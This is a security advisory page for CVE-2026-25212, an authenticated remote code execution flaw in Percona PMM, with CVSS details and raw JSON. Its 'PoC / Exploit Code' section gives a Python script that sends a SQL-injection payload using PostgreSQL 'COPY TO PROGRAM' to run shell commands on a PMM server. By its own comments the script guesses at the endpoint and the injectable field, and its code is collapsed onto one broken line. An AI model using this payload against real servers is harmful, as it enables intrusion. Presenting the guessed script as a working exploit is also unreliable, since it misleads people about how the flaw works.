Security Vulnerability Report
中文
CVE-2026-25212 CVSS 9.9 CRITICAL

CVE-2026-25212

Published: 2026-04-02 17:16:22
Last Modified: 2026-04-21 00:33:37
Source: [email protected]

Description

An issue was discovered in Percona PMM before 3.7. Because an internal database user retains specific superuser privileges, an attacker with pmm-admin rights can abuse the "Add data source" feature to break out of the database context and execute shell commands on the underlying operating system.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:percona:monitoring_and_management:*:*:*:*:*:*:*:* - VULNERABLE
Percona PMM < 3.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target URL (Example) TARGET_URL = "http://target-pmm-server:8080" API_ENDPOINT = f"{TARGET_URL}/v1/Management/Add" # Attacker credentials with pmm-admin rights AUTH = { "username": "attacker", "password": "password" } # Malicious payload to execute shell command via data source abuse # Note: The specific payload depends on the underlying DB (PostgreSQL/MySQL) # Assuming PostgreSQL for this example using COPY TO PROGRAM payload = { "name": "malicious_ds", "address": "127.0.0.1", "port": 5432, "type": "postgresql", # The 'username' or 'password' field might be injectable, or a custom config field # Here we simulate a command injection scenario "custom_params": "'; COPY (SELECT '') TO PROGRAM 'touch /tmp/pwned'; --" } try: response = requests.post(API_ENDPOINT, json=payload, auth=(AUTH['username'], AUTH['password'])) if response.status_code == 200: print("[+] Payload sent successfully. Check for command execution.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25212", "sourceIdentifier": "[email protected]", "published": "2026-04-02T17:16:21.687", "lastModified": "2026-04-21T00:33:36.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Percona PMM before 3.7. Because an internal database user retains specific superuser privileges, an attacker with pmm-admin rights can abuse the \"Add data source\" feature to break out of the database context and execute shell commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:percona:monitoring_and_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.7.0", "matchCriteriaId": "ADFFE237-8E2D-44DD-AB6C-91E36E7D81B3"}]}]}], "references": [{"url": "https://docs.percona.com/percona-monitoring-and-management/3/release-notes/3.7.0.html#authenticated-remote-code-execution-via-internal-data-source-cve-2026-25212", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://percona.com", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.